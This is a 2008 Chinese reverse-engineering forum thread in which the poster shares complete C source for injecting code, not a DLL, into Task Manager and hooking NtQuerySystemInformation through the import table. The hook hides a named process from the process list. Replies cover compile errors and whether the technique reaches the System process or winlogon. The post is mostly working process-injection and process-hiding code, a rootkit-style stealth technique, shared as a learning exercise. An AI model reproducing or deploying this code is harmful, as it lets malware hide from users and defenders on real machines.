首页
论坛
专栏
课程

[原创]IAT HOOK 代码注入非DLL

2008-10-13 15:26 19924

[原创]IAT HOOK 代码注入非DLL

2008-10-13 15:26
19924
使用代码注入来实现进程隐藏  而不是使用DLL注入来实现进程隐藏
没有什么高级技术  纯体力活  原理就不说了  只是没有通过DLL注入  来实现HOOK API
纯粹注入代码   邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的  发现汇编注入代码远比C注入代码来的繁  所以用C实现了
主要功能就是 隐藏进程   不过RING3的似乎没多大用  练习而已
代码如下:
//需要编译成release版本  DEBUG版本 对函数生成的跳转地址表
//jmp xxxxx  写入远程进程的时候xxxxx等于写入了一个全局变量
// 程序必然崩溃
#include "Iat_Hook.h"

char cPath[] = "taskmgr.exe";

void main(void)
{
        //定义变量
        DWORD dwPid;
        HANDLE hProcess;
        DWORD dwSize = 2048;
        PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
        REMOTESTRUCT stRemoteStruct;

        //遍历进程 寻找taskmgr.exe进程ID
    dwPid = GetProcessPid(cPath);

        // open process 得到进程句柄
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
        if(hProcess == NULL)
        {
                printf("open error code %d\n",GetLastError());
                return;
        }
       
        //写入 替代函数
        MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);

        //初始化结构
        InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);

        //写入结构
        pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);

        //写入远程线程函数
        pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

        //创建远程线程
        CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);
        CloseHandle(hProcess);
}

DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
{
        FARPROC fpVirtualQuery;
        FARPROC fpVirtualProtect;
        FARPROC fpOpenProcess;
        FARPROC fpEnum;
        FARPROC fpGetProcAddress;
        FARPROC fpLoadLibrary;
        FARPROC fpFreeLibrary;
        FARPROC fpWriteMemory;
        FARPROC fplstrcmp;

        HANDLE hProcess = NULL;
        HMODULE hMods[256];
        DWORD dwNeed;
        HANDLE hPsapi;
        MEMORY_BASIC_INFORMATION stMem;
        HMODULE hKernel, hModule;
        PIMAGE_NT_HEADERS pImageNtHeaders;
        PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
        IMAGE_DATA_DIRECTORY ImageImport;
        PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
        PIMAGE_THUNK_DATA pImageThunkData;
        DWORD oldProtect;
        wchar_t *p = pRemoteStruct->cProcessName;

        //初始化函数指针
        fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
        fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
        fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;
        fpLoadLibrary = (FARPROC)pRemoteStruct->dwLoadLibrary;
        fpFreeLibrary = (FARPROC)pRemoteStruct->dwFreeLibrary;
        fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
        fpWriteMemory = (FARPROC)pRemoteStruct->dwWriteProcessMemory;
        fplstrcmp = (FARPROC)pRemoteStruct->dwlstrcmp;

        //得到进程句柄
        hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
        if(!hProcess)
                return 0;

        //得到模块基址 模块基址存放于hMods[0]
        hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
        fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
        fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);
        fpFreeLibrary(hPsapi);
        hModule = hMods[0];

        //改变内存属性  因为采用的不是DLL插入 NtQuerySystemInformation的原始地址无法通过
        //全局变量传递给 替代函数 这里通过把函数地址写入kernel的PE头 来实现 这样只需要在替代函数中读出地址就可以了
        hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
        fpVirtualQuery(hKernel,&stMem, sizeof (MEMORY_BASIC_INFORMATION));
        fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
        fpWriteMemory(hProcess, (PBYTE)(hKernel)+4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
        fpWriteMemory(hProcess, (PBYTE)(hKernel)+8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
        fpWriteMemory(hProcess, (PBYTE)(hKernel)+0x14, &p, sizeof(DWORD), NULL);
        fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);

        //查找导入表 找到存放NtQuerySystemInformation
        pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c) + (DWORD)hModule);
        pImageOptionalHeader = &pImageNtHeaders->OptionalHeader;
    ImageImport = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
        pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);

        while(pImageImportDescriptor->Name)
        {
                if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))
                {                       
                        break;
                }
                pImageImportDescriptor++;
        }
        //替换 NtQuerySystemInformation的地址
        pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);
        while(pImageThunkData->u1.Function)
        {
                if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)
                {
                        fpVirtualQuery(&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));
                        fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
                        pImageThunkData->u1.Function =  pRemoteStruct->dwMyAddress;
                        break;
                }
                pImageThunkData++;
        }
        fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
        return 0;
}

NTSTATUS WINAPI myNtQuerySystemInformation  (
                    SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                PVOID SystemInformation,
                            ULONG SystemInformationLength,
                PULONG ReturnLength)
{
        HANDLE hKernel;
        NTSTATUS ntStatus;
        wchar_t *pName;
        PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;

        FARPROC fpNtQuerySystem;
        FARPROC fplstrcmpW;

        //寻找kernel32的基址  准备读取需要用到的函数地址
        _asm
        {
                mov eax,fs:[0x30]
                mov eax,[eax+0xc]
                mov ecx,[eax+0x1c]
                mov ecx, [ecx]
                mov eax, [ecx+8]
                mov hKernel,eax
        }
        //取得函数地址
        fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
        fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);
        //取得 需隐藏的进程名
        pName = *(wchar_t **)((DWORD)hKernel + 0x14);

        ntStatus = (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
        if (SystemProcessesAndThreadsInformation == SystemInformationClass)
        {
                pForward = NULL;
                pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
                while(pCurrent->NextEntryDelta)//检验是否到 最后一个进程结构
                {
                        if(pCurrent->ProcessName.Buffer)
                        {
                                //_asm int 3
                                if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
                                {
                                        if(pForward)
                                        {
                                                if(pCurrent->NextEntryDelta)//隐藏的进程在链表中间                                                       
                                                {
                                                        pForward->NextEntryDelta += pCurrent->NextEntryDelta;
                                                }
                                                else//隐藏的进程在链表末端
                                                        pForward->NextEntryDelta = 0;
                                        }
                                        else //要隐藏的进程在链表头时
                                        {
                                                if(pCurrent->NextEntryDelta)
                                                {
                                                        SystemInformation = (PBYTE)pCurrent + pCurrent->NextEntryDelta;
                                                }
                                                else
                                                        SystemInformation = NULL;
                                        }
                                }
                        }
                                pForward = pCurrent;
                                pCurrent = (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);
                }
                //_asm int 3
        }
        return ntStatus;
}

//得到进程PID
DWORD GetProcessPid(char *cPath)
{
        PROCESSENTRY32 stProcess;
        HANDLE hSnap;
        BOOL bRet;
        hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hSnap == INVALID_HANDLE_VALUE)
        {
                printf("error\n");
                return 0;
        }
        stProcess.dwSize = sizeof (PROCESSENTRY32);
        bRet = Process32First(hSnap, &stProcess);
        if(!bRet)
        {
                printf("first error\n");
                return 0;
        }
        do
        {
                if(0 == strcmp(stProcess.szExeFile, cPath)) //find  process of target
                {
                        break;
                }
        }while(Process32Next(hSnap, &stProcess));

        //确认 是否找到 目标进程
        if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))
        {
                printf("can not find process\n");
                return 0;
        }
        CloseHandle(hSnap);
        return stProcess.th32ProcessID;
}

VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
{
        HANDLE hNtdll;
        HANDLE hKernel;

        hNtdll = LoadLibrary("ntdll.dll");
        pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
        FreeLibrary(hNtdll);

        hKernel = LoadLibrary("kernel32.dll");
        pRemoteStruct->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
        pRemoteStruct->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
        pRemoteStruct->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");
        pRemoteStruct->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
        pRemoteStruct->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
        pRemoteStruct->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
        pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
        pRemoteStruct->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");
        pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");
        FreeLibrary(hKernel);
       
        pRemoteStruct->dwMyAddress = MyAddress;
        pRemoteStruct->dwPid = dwPid;
        strcpy(pRemoteStruct->cDllName, "Psapi.dll");
        strcpy(pRemoteStruct->cFunName, "EnumProcessModules");
        strcpy(pRemoteStruct->cKernel,"Kernel32.dll");
        strcpy(pRemoteStruct->cNtdll, "ntdll.dll");
        //要隐藏的进程名
        wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
}

Iat_Hook.h

//头文件
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <imagehlp.h>
#include "Winternl.h"

#pragma comment(lib, "imagehlp")
//类型声明

typedef int NTSTATUS;
typedef BOOL (__stdcall *ENUMPROCESSMODULES)(
            HANDLE hProcess,
            HMODULE* lphModule,
            DWORD cb,
            LPDWORD lpcbNeeded
);

typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(
                                                SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                                PVOID SystemInformation,
                                                ULONG SystemInformationLength,
                                                PULONG ReturnLength
);

typedef struct _REMOTE_STRUCT
{
        DWORD dwNtQuerySystem;
        DWORD dwVirtualQuery;
        DWORD dwVirtualProtect;
        DWORD dwOpenProcess;
        DWORD dwMessageBox;
        DWORD dwLoadLibrary;
        DWORD dwGetProcAddress;
        DWORD dwFreeLibrary;
        DWORD dwWriteProcessMemory;
        DWORD dwlstrcmp;
        DWORD dwlstrcmpW;
        DWORD dwEnum;
        DWORD dwMyAddress;
        DWORD dwPid;
        char cDllName[50];
        char cFunName[50];
        char cKernel[50];
        char cNtdll[50];
        wchar_t cProcessName[50];//要隐藏的进程名
}REMOTESTRUCT, *PREMOTESTRUCT;

//函数声明
DWORD GetProcessPid(char *cPath);
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
NTSTATUS WINAPI myNtQuerySystemInformation  (
                    SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                PVOID SystemInformation,
                            ULONG SystemInformationLength,
                PULONG ReturnLength);

Winternl.h

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;                 //注意,这里为Unicode类型
} UNICODE_STRING, *PUNICODE_STRING;

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_PROCESS_INFORMATION  
{  
    DWORD NextEntryDelta;  
    DWORD dThreadCount;  
    DWORD dReserved01;  
    DWORD dReserved02;  
    DWORD dReserved03;  
    DWORD dReserved04;  
    DWORD dReserved05;  
    DWORD dReserved06;  
    FILETIME ftCreateTime; /* relative to 01-01-1601 */  
    FILETIME ftUserTime; /* 100 nsec units */  
    FILETIME ftKernelTime; /* 100 nsec units */  
    UNICODE_STRING ProcessName;      //这就是进程名
    DWORD BasePriority;  
    DWORD dUniqueProcessId;            //进程ID
    DWORD dParentProcessID;  
    DWORD dHandleCount;  
    DWORD dReserved07;  
    DWORD dReserved08;  
    DWORD VmCounters;  
    DWORD dCommitCharge;  
    PVOID ThreadInfos[1];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

后记:第一次没有照着书 打代码  也找不到C 注入代码的例子 能找到的都是DLL注入
原理早就知道了  真的写一遍 不容易
整个编写的过程 碰到了很多问题 最终都解决了  轻松了

2020安全开发者峰会(2020 SDC)议题征集 中国.北京 7月!

最新回复 (31)
笨笨雄 14 2008-10-14 23:32
2
0
感谢分享代码
靴子 2008-10-15 20:53
3
0
象牛人学习
haras 2008-10-15 23:33
4
0
能进入System进程空间吗?
qyc 4 2008-10-17 10:01
5
0
把工程打包下就更好了,"无法无天的请求"
cyliu 1 2008-10-19 10:15
6
0
支持。只有想不到,没有做不到
panti 2008-10-20 10:14
7
0
真不得了,我在注入的进程(EXPLORER。EXE)里开了一个线程,结果文件夹一刷新就出错,纳闷不知怎么回事
徐大力 8 2008-10-20 18:10
8
0
System 空间不清楚 你试试 提到调试权限看看  不过我估计不能
驱动的DriverEntry例程 就是由System 处理  要进入 至少也要是个驱动吧

7L 的试试 在远程线程的代码  插一些 int 3 指令 虽然OD不能调试
但是可以通过OD查看内存  特别是API函数调用前后
71190838 1 2008-10-21 02:31
9
0
进入 System 空间应该也可以的,有些挂机锁就是用这个原理让勾子函数挂到WinLogon.exe上去了,不过好像只能是只读操作,有写入操作就会蓝屏。
莽莽 2008-10-21 11:41
10
0
我晕,编译通不过啊。先是
  CreateRemoteThread(hProcess, NULL, 0,
      pRemoteAddress,pRemoteStructAddress, 0, 0);出错,无法将PVOID转换为(LPTHREAD_START_ROUTINE),强制转换后,又在
  hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS,
      FALSE, pRemoteStruct->dwPid);
出现错误       
1        error C2197: 'FARPROC' : too many arguments for call        f:\CRACK\学习笔记\VC++\IATHook\Iat_Hook.cpp        87       
——fpOpenProcess是FARPROC型,而windef.h中
typedef int (FAR WINAPI *FARPROC)();
后面还有很多类似的错误,楼主是如何调试通过的?我是在vs 2005 中建了个空项目,再把文件添加进去,不知道是不是这个原因?
徐大力 8 2008-10-21 14:29
11
0
VC 6.0
vs 2005 没用过。。。

GetProcAddress的声明
FARPROC
WINAPI
GetProcAddress(
    HMODULE hModule,
    LPCSTR lpProcName
    );
  
GetProcAddress得到的值都是FARPROC类型的
基本的东西查查MSDN吧还有C的基础打好
不回帖了  简单的把13L问题解释下
The LPTHREAD_START_ROUTINE type defines a pointer to this callback function. ThreadProc is a placeholder for the application-defined function name.

DWORD WINAPI ThreadProc(
  [in]                 LPVOID lpParameter
);
我的声明是
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
WINAPI的声明 #define WINAPI __stdcall
LPVOID声明 typedef void *LPVOID  
void* (PVOID)实际上可以表示任意内存块的地址 详见C89  或者C99
返回PVOID  用之前强制转换一下就行了  至少VS2008 没有强制转换 可以正常编译
VS2005 和VS2008 里面添加的一大堆东西我看了头昏 所以除了查资料 一般我还是用VC6的

14L
系统直接有的 但是不能在远程线程中使用系统的  所以自己定义了一个变量存放它们的地址  fpGetProcAddress存放GetProcAddress
的地址 你也可以让它存放 LoadLibraryA的地址 变量名那样用只是方便记忆而已 变量名前加个fp 代表变量是个函数指针 function point  小程序无所谓的
fpEnum   指的是EnumProcessModules ,fplstrcmp指的是lstrcmpA    函数的用法不知道的话 一个就是MSDN 或者 google
菜菜小J 2008-10-21 17:07
12
0
《Three Ways to Inject Your Code into Another Process》

早之前的这个文章也给了大家很大的帮助。
莽莽 2008-10-21 20:20
13
0
  //写入远程线程函数
  pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

  //创建远程线程
  CreateRemoteThread(hProcess, NULL, 0,
      pRemoteAddress,pRemoteStructAddress, 0, 0);
  CloseHandle(hProcess);
}
在我的VS 2005中,VirtualAllocEx返回PVOID,PVOID pRemoteAddress正好可以作为WriteProcessMemory的参数,但是CreateRemoteThread第四个参数需要(LPTHREAD_START_ROUTINE)型,强制转换可以编译过去,难道是VS 2005和vc 6.0不一样?晕,这点小问题搞了一天了
莽莽 2008-10-22 12:15
14
0
还是想问一问,  FARPROC fpVirtualQuery;
  FARPROC fpVirtualProtect;
  FARPROC fpOpenProcess;
  FARPROC fpEnum;
  FARPROC fpGetProcAddress;
  FARPROC fpLoadLibrary;
  FARPROC fpFreeLibrary;
  FARPROC fpWriteMemory;
  FARPROC fplstrcmp;——系统都有了类似的函数,为什么要在前面加个fp,自己重新写个呢?功能是一样的吧?就是fpEnum,fplstrcmp不知道是干什么的啊?
newjueqi 7 2008-11-1 20:19
15
0
看了12楼介绍的文章,发觉老外的文章风格还是很觉得学习的,把整个思路都描述得很清楚,而且整篇文章结构清晰,使人产生阅读的快感
flameanger 2008-11-6 17:14
16
0
和楼主类似的代码实现,但为什么在远程线程中调用传进去的 系统 API ,会使目标进程自动退出?
也就是,在远程线程中总是不能调用已经传好的API
由于我是用C++ builder 编译的,把FARPROC 都 改成具体的函数的预定义了
flameanger 2008-11-6 17:18
17
0
API函数指针正确,在本进程运行,没有问题
abcdnswjl 2008-11-8 18:31
18
0
请问楼主,编译程序时出现这些问题,不知如何修正,请指教!!
Compiling...
test1.cpp
C:\test\test1\test1.cpp(51) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(56) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(57) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(58) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(59) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(64) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(65) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(66) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(67) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(68) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(69) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(70) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(80) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(92) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(93) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(99) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(133) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(143) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(217) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(218) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(221) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(222) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(223) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(224) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(225) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(226) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(227) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(228) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(229) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(230) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(279) : error C2664: 'CreateRemoteThread' : cannot convert parameter 4 from 'void *' to 'unsigned long (__stdcall *)(void *)'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
Error executing cl.exe.

test1.exe - 31 error(s), 0 warning(s)
darkbot 2008-11-10 18:13
19
0
学习了...
zcUDer 2008-11-11 11:50
20
0
看了楼主的代码,心中有点疑惑,
楼主先在InitializeStruct中loadlibrary了kernel32.dll,然后再调用createmotethread并把api的地址作为参数传进去,感觉有些不解。
获取的api地址是本进程的api地址,并不是目标进程的api地址,而注入到目标进城以后可能因为dll重定位导致函数地址不正确,
我的想法是在线程函数中调用GetProcAddress,获取api地址,
请诸位大大姐大小弟心中的疑惑
abcdnswjl 2008-11-11 16:58
21
0
为什么大虾们都不帮我们解决一下问题啊,都知道怎么做,就是不肯回答一下(18楼)
hyoyy 2008-11-12 12:38
22
0
看不懂呀..
trkzrq 2008-11-13 10:46
23
0
这里获取的不是本进程的API地址,也不是目标进程的API地址,而是API在内存中的地址,而且这些地址对所有进程来说都是一样的。
五德转移 2008-11-15 18:56
24
0
vs2008编译通过,不能运行,release编译36个错误。
gongbin 2008-11-16 13:01
25
0
功力不深厚  看不懂呀...继续学习中..
komawang 2009-6-5 17:07
26
0
谁有编译通过的一份发给我下,谢谢!

koma0769@vip.qq.com
努力成长 2009-6-30 17:07
27
0
支持楼上的观点。
鹿剑 3 2009-6-30 18:27
28
0
好文章,学习了
fanndy 2009-6-30 18:28
29
0
2008  能运行  不过好像没效果 再看看
pubhobo 2009-6-30 19:08
30
0
感谢分享代码了
jesterjy 1 2009-7-1 01:19
31
0
kernel32.dll在每个进程中的地址是一样的,所以在本进程中得到的LoadLibrary、GetProcAddress等函数的地址在其他进程中的地址也是一样的。
徐大力 8 2009-7-1 21:54
32
0
都这么长时间了。。。。。没人编译成功?

传份BIN 好了  省得有人怀疑   最好用原版的XP实验
现在很多修改版XP  都对任务管理器 加壳了  所以 不一定有用
今天 宽带欠费   拔网线  开无线网卡 居然能上。。。。。
上传的附件:
游客
登录 | 注册 方可回帖
返回